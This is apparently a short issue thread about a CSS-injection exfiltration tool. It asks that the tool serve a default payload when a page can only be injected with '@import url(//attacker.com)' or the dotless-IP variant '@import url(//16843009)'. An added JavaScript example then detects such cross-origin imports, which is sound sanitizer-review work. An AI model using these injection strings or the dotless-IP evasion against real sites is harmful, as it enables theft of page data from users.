Payload response for /
Hey d0nut, here's another enhancement request.
Since we're specifying charset on the command line, why not also allow specifying a default staging len value? This way, if no path is specified, a targeted payload could still be delivered.
For example, if we could only inject (assuming protocol-relative URL support):
@import url(//attacker.com)
Then a payload could be generated using whatever len argument was specified via the command line (a sensible default, like 12, could be assumed if none is provided via URL or CLI).
This would have the advantage of limiting the characters required for successful injection to only ().a-z/. This could be reduced further to just ()0-9/ using a dotless IP:
@import url(//16843009)
Wouldn't that be cool?
Yup! Seems reasonable to make / also respond just like /staging?len=<default>
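
For reviewers of CSS sanitizers, an added example (not code from this thread or from the project) showing why a filter has to normalise hosts before judging an `@import` target: the dotless form above parses to an ordinary IPv4 address. The function name, the result fields and the `app.example` page URL are assumptions made for illustration.

```javascript
// Added example, not code from the thread. Lists cross-origin @import targets
// in untrusted CSS, with hosts normalised by the WHATWG URL parser.
// The regex is a simplification: CSS comments and escapes are not handled.
const IMPORT_RE =
  /@import\s*(?:url\(\s*(["']?)([^"')]*)\1\s*\)|(["'])([^"']*)\3)/gi;

function findExternalImports(css, pageUrl) {
  const base = new URL(pageUrl);
  const findings = [];
  for (const m of css.matchAll(IMPORT_RE)) {
    const raw = (m[2] !== undefined ? m[2] : m[4]).trim();
    let target;
    try {
      target = new URL(raw, base); // resolves "//host" against the page scheme
    } catch {
      findings.push({ raw, host: null, hostRewritten: false });
      continue;
    }
    if (target.origin === base.origin) continue; // same-origin import, ignore
    // Authority exactly as written in the CSS, before normalisation.
    const written = (raw.match(/^(?:[a-z][a-z0-9+.-]*:)?\/\/([^\/?#]*)/i) || [])[1];
    findings.push({
      raw,
      host: target.hostname, // "16843009" becomes "1.1.1.1" here
      hostRewritten: written !== undefined && written.toLowerCase() !== target.host,
    });
  }
  return findings;
}

// Constructed sample input using the two injection strings quoted in the thread.
const SAMPLE_CSS = [
  '@import "theme.css";',
  "@import url(//attacker.com)",
  "@import url(//16843009)",
].join("\n");

console.log(findExternalImports(SAMPLE_CSS, "https://app.example/"));
```

A `hostRewritten` value of `true` means the host as written differs from what the parser connects to, which is a useful signal that an allowlist comparing raw strings would have been bypassed.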